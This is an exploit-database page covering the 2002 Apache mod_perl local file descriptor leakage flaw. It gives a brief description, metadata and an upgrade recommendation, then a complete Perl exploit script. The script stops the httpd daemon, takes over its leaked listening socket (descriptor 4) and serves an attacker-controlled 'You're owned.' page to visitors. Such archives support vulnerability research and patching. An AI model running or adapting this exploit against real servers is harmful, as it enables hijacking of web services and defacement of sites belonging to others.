header-logo
Suggest Exploit
vendor:
mod_perl
by:
SecurityFocus
7.5
CVSS
HIGH
Local File Descriptor Leakage
255
CWE
Product Name: mod_perl
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Mac, Windows
2002

Apache mod_perl Local File Descriptor Leakage

A vulnerability has been reported to exist in the Apache mod_perl module that may allow local attackers to gain access to privileged file descriptors. This issue could be exploited by an attacker to hijack a vulnerable server daemon. Other attacks are also possible. It has been reported that multiple file descriptors, are leaked to the mod_perl module and any processes it creates. This allows for Perl scripts and any processes they spawn to access the privileged I/O streams.

Mitigation:

Upgrade to the latest version of Apache mod_perl module.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9471/info

A vulnerability has been reported to exist in the Apache mod_perl module that may allow local attackers to gain access to privileged file descriptors. This issue could be exploited by an attacker to hijack a vulnerable server daemon. Other attacks are also possible.

It has been reported that multiple file descriptors, are leaked to the mod_perl module and any processes it creates. This allows for Perl scripts and any processes they spawn to access the privileged I/O streams.

#!/usr/bin/perl

use POSIX qw(setsid);

if (!defined(my $pid = fork)) {
        print "Content-Type: text/html\n\n";
        print "cannot fork: $!";
        exit 1;
} elsif ($pid) { # This is the parent
        sleep(1);
        print "Content-Type: text/html\n\n";
        print "<html><body>Exploit installed</body></html>";
        system '/usr/sbin/httpd2 -k stop';
        sleep(2);
        exit 0;
}

# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
        my $rin = '';
        vec($rin,fileno(Server),1) = 1;
        $nfound = select($rout = $rin, undef, undef, undef);
        if (accept(Client,Server) ) {
                print Client "HTTP/1.0 200 OK\n";
                print Client "Content-Length: 40\n";
                print Client "Content-Type: text/html\n\n";
                print Client "<html><body>";
                print Client "You're owned.";
                print Client "</body></html>";
                close Client;
        }
}

Navigation

Suggest Exploit

Services By CQR